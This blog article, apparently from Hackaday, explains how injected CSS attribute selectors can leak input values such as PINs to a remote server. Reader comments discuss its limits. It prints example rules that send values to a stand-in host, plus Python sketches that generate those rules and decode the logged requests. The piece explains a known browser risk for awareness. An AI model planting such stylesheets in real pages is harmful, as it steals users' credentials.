CSS Steals Your Web Data

Earlier this year, we posted a link to an interactive Web page. Most people seemed to like it, but we got at least one comment about how they would never be so incautious as to allow JavaScript to run on their computers. You can argue the relative merit of that statement, but it did remind us that just disabling JavaScript is no panacea when it comes to Internet security. You might wonder how you could steal data without scripting, assuming you don’t directly control the server or browser, of course. The answer is by using a cascading style sheet (CSS). [Live Overflow] explains the exploit in the video below, covering an older paper and a recent rediscovery of the technique.

The technique hinges on you getting a stylesheet into the web page. Maybe you’ve partially compromised the server or maybe you wrote a malicious browser extension. The method works because you can make a style conditional on an attribute of an element. That means you can ask CSS to apply some special formatting to a text field with a certain value. If that formatting loads a background image from a server you control, then you can tell whether the field has a particular value.
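To make the "conditional on an attribute" part concrete, here is a minimal Python sketch that mimics how the four common CSS attribute selector operators compare a selector string against an attribute value. The function name `attribute_selector_matches` is our own invention for illustration; a real browser does this matching internally, and this sketch ignores details such as case-insensitivity flags.

```python
def attribute_selector_matches(operator: str, needle: str, value: str) -> bool:
    """Mimic [attr=v], [attr^=v], [attr$=v] and [attr*=v] for one attribute value.

    Hypothetical helper for illustration only; it is not a browser API.
    """
    if operator == "=":
        # Exact match on the whole attribute value.
        return value == needle
    if needle == "":
        # For the substring operators, an empty selector string matches nothing.
        return False
    if operator == "^=":
        return value.startswith(needle)
    if operator == "$=":
        return value.endswith(needle)
    if operator == "*=":
        return needle in value
    raise ValueError(f"unsupported operator: {operator!r}")


if __name__ == "__main__":
    # A rule with [value$="34"] would apply to an input whose value attribute is "1234".
    print(attribute_selector_matches("$=", "34", "1234"))
    # An exact-match rule for "34" would not.
    print(attribute_selector_matches("=", "34", "1234"))
```

Whenever a selector like this matches, the browser applies the rule's declarations, and that is the hook the exploit relies on.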

We didn’t say it was easy. Suppose you want to capture a four-digit PIN. You will need 10,000 rules, one for each possible value. For example:

input[type="pin"][value$="0000"] { background-image: url(http://notahackaday.com/0000.png); }
input[type="pin"][value$="0001"] { background-image: url(http://notahackaday.com/0001.png); }
...
input[type="pin"][value$="9999"] { background-image: url(http://notahackaday.com/9999.png); }
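Nobody would type those rules by hand. As a rough sketch, a few lines of Python could write them out. The function name `pin_rules` and its parameters are hypothetical, the `type="pin"` selector is copied from the listing as-is, and the output uses `background-image`, which is the property that accepts a `url()` value.

```python
def pin_rules(host: str = "http://notahackaday.com", digits: int = 4) -> list[str]:
    """Return one CSS rule per possible PIN (hypothetical helper, illustration only)."""
    rules = []
    for n in range(10 ** digits):
        pin = f"{n:0{digits}d}"  # zero-padded, e.g. 7 -> "0007"
        rules.append(
            f'input[type="pin"][value$="{pin}"] '
            f'{{ background-image: url({host}/{pin}.png); }}'
        )
    return rules


if __name__ == "__main__":
    rules = pin_rules()
    print(len(rules))  # 10000 rules for a four-digit PIN
    print(rules[0])
```

Each rule points at a different image name, so the name of the file the browser asks for encodes the value that matched.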

The idea is to track when a particular client loads one of the image files. Then you can assume you know which PIN was present. This is painful and would be worse if you wanted to capture a Social Security number, a credit card number, or arbitrary text. In addition, the technique operates on attributes, not on what the user types into the field. Unfortunately for us, many common frameworks keep a text input’s value attribute in sync with its contents for simplicity. That plays right into the attacker’s hands.
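On the receiving end, the work is just reading file names out of the request log. Here is a minimal sketch, assuming the server sees request paths of the form `/0042.png`. The helper names `pin_from_request_path` and `rules_needed` are ours, and the second one simply shows how quickly the rule count grows with the number of digits.

```python
import re
from typing import Optional

# Assumed path layout: a slash, exactly four ASCII digits, then ".png".
PIN_PATH = re.compile(r"/([0-9]{4})\.png")


def pin_from_request_path(path: str) -> Optional[str]:
    """Recover the PIN encoded in a requested image path, or None if it is unrelated."""
    match = PIN_PATH.fullmatch(path)
    return match.group(1) if match else None


def rules_needed(digits: int) -> int:
    """Number of rules when every possible value of a numeric field gets its own rule."""
    return 10 ** digits


if __name__ == "__main__":
    print(pin_from_request_path("/0042.png"))    # 0042
    print(pin_from_request_path("/favicon.ico"))  # None
    print(rules_needed(4), rules_needed(9))       # 10000 1000000000
```

A nine-digit number entered in a single field would need a billion rules under this one-rule-per-value scheme, which is why the approach only makes sense for short values.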

As [Live Overflow] explains, some have called this a keylogger, but that’s a bit of a stretch. We think of a keylogger as something that can watch what we type anywhere. This simply probes for certain input values in a specific place. Still, it does illustrate that almost any technology can be subverted by malicious programmers.

This illustrates our own [Jack Laidlaw’s] quote: “The easiest way to secure a device is to turn it off.” Turns out these days even your dishwasher isn’t safe.

26 thoughts on “CSS Steals Your Web Data”

  1. Eh, it grows just like any brute-force. You’d need a billion CSS rules to capture a social security number that’s entered in a single text field, and you probably wouldn’t want to ask people to download that and load it into RAM.

    1. Supposedly the $= is telling it you want to match on the pattern at the end of the attribute. But I can’t get it to match on the value of an input field in Chrome. If it works, you will see a new query for each letter on the server. Then you just combine those over time to figure out what they typed. You don’t need to have an entry for each and every possible combination.

    2. However, if the css is applied fast enough to request the backgrounds of intermediary results while the victim is typing, you could then use the intermediary knowledge the next time the victim visits the page in order to find out the next couple of characters

  2. Actually I don’t think 10000 rules are needed. The “value$=A” selector looks for elements ending with A. When you add a new character, a new css rule applies and a new background image is requested.

    A rogue Chrome extension could act as a keylogger, I could imagine…

  3. What is the point of trying to exfiltrate information like this anyway? Apart from being impractical for any reasonably-sized password, if you can inject CSS in the page, you might as well just inject JS directly and read out the password; it isn’t blocked by the browser in any shape or form.

    If after that you want to send it over the net in a file name, the end result is the same, sans 10GB CSS file that makes your browser crash.

      1. No it isn’t, the value attribute is not updated by CSS alone. However JS frameworks like React will often do it, making this CSS work; indeed that’s what was happening on the Instagram login page, the first example used to demonstrate this.

        If you had JS disabled, this wouldn’t work. If you did have it enabled, it would be much easier for the attacker to use JS to get the input value.

    1. (I hope) You wouldn’t let someone else include Javascript in the ads they display on your page (sadly, a lot of ad networks do exactly that, simply include Javascript).

      But you might allow embedding of CSS: Why not? It’s only to format elements of your website, not able to exfiltrate anything….

      Much worse than ads (I hope people are cautious enough not to display ads on their login pages, but then again, login often is just a field at the top of every single page) is things like wordpress themes. These are low-quality, seldom maintained, happily loaded across the internet things that web “developers” like to rely on

      1. Things like

        that, for example, this very site includes. I’m sure wordpress’s own CSS hosting service is absolutely trustworthy and they hand-scan every single CSS for such shenanigans.

    2. A lot of websites (the majority of commercial ones these days) use externally hosted CSS, with Google notably being one that provides the oh-so-handy snippets on its servers. Obviously they probably do it to see who visits where, but they could do even worse. Or any hop in between can inject alterations if it isn’t hosted on a secure site.

      And for some reason some payment systems insist on clients using a pin code of numbers only of a limited length, like for instance 6 numbers max.

  4. Several things of note.

    The “keylogger” itself won’t work without javascript (as explained in the video). You might incidentally be able to get form information on a page without javascript, but it has to be data pre-populated in the form. DOM node attributes are not the same as input values, and, for it to work “live”, you need some javascript framework to sync those up.

    This experiment also presumes background content for CSS is loaded *as-needed* instead of up front. I suppose browsers generally do as-needed loading of background content, but my point is more to show there’s probably some flexibility here. Unless browsers have to load things as-needed for compliance with some arbitrary RFC or something along those lines, this behavior can be easily changed.

    Furthermore, once the image content is loaded as necessary per rule invocation, that content has no need to be loaded once again. So with the javascript syncing attributes, etc, maybe you could learn that a field has one “x”, but unless you have rules that could account for all the permutations of two “x”s, you won’t get the second “x”. Maybe that can be tricked by throwing some error which would force the browser to try reloading the background image again and again, but I don’t know if there is a browser that would attempt the loading of a background more than once. (To be honest it’s been a while since I messed with this stuff.)

    Finally, there’s nothing that I can see to log backspaces. You’d need an additional javascript trick for that.

    1. expiring cache can be used to trigger a load on multiple occurrences. backspace is an issue, but the result can be brute forced along the possible typos. intentional backspaces are harder to catch, but still fewer tries are needed than retesting all combinations.

  5. Hello, I remember that I was looking for something on a certain website and found out that to get it I had to install two apps. One was from the Play Store and the other was not; the game was from an untrusted page/server, so I decided not to install it. What concerns me is that on the web page I had to enter my username and the OS I was using (iOS or Android). I clicked continue, and afterwards I saw many letters, as if I were watching The Matrix. I think this is what developers/programmers call source code. I was only able to read something like “Injecting… bla.. bla…” (I don’t remember). I panicked and uninstalled the app from the Play Store, and the other one I never installed. Then I went to clean the RAM and the memory, but I am not sure if my Android has a virus or if my information is at risk/compromised. I’d like to hear/read a recommendation about how to clean my device of viruses/adware/malware.

    Regards,
    Yader R.

  6. the ingenuity of the thing comes in when you match just on the last letter of that field. unless the victim copies+pastes his/her password, you can pick up all the characters on the server side as they are entered. spaghetti code like the code block in the HaD post is not necessary, just a few lines for each possible letter (~90), and it definitely will not crash your browser. it does, however, require the browser to fire events on each keystroke to sync the DOM value with the HTML attribute value.

  7. This is nifty, and worth taking into account when the goal is “privacy at all costs” (think dissident or whistleblower, where all that care put into TOR can just be moot for any shred of info the stupid browser gives away).

    But not to be compared with javascript (or any other “active” content — be it Flash or Google’s new&shiny Dart reborn). They are mining bitcoins[1] with javascript bugs these days, FFS!

    I think it is important to keep the Web somewhat viable without javascript et al.

    [1] Yeah, not exactly bitcoins, just some other cryptocurrency-du-jour.
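
Several commenters describe a per-character variant: one rule per possible last character rather than one rule per complete value. The Python sketch below simulates what the server would see under two assumptions taken from the thread: something on the page copies the typed text into the value attribute on every keystroke, and the browser fetches each background URL at most once. The names `last_char_rules` and `observed_requests` are hypothetical, and the alphabet is limited to lowercase letters and digits to avoid CSS string escaping.

```python
import string

ALPHABET = string.ascii_lowercase + string.digits  # assumed character set


def last_char_rules(host: str = "http://notahackaday.com") -> list[str]:
    """One rule per possible final character (hypothetical helper, illustration only)."""
    return [
        f'input[value$="{ch}"] {{ background-image: url({host}/{ch}.png); }}'
        for ch in ALPHABET
    ]


def observed_requests(typed: str) -> list[str]:
    """Characters the server would learn, assuming each image URL is fetched only once."""
    already_fetched = set()
    seen_by_server = []
    for length in range(1, len(typed) + 1):
        last = typed[:length][-1]  # the value attribute now ends with this character
        if last in ALPHABET and last not in already_fetched:
            already_fetched.add(last)
            seen_by_server.append(last)
    return seen_by_server


if __name__ == "__main__":
    print(len(last_char_rules()))      # 36 rules instead of thousands
    print(observed_requests("hello"))  # ['h', 'e', 'l', 'o']
```

Under these assumptions, the second "l" in "hello" never reaches the server, which is the caching limitation raised in the thread. Backspaces are not modeled at all.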
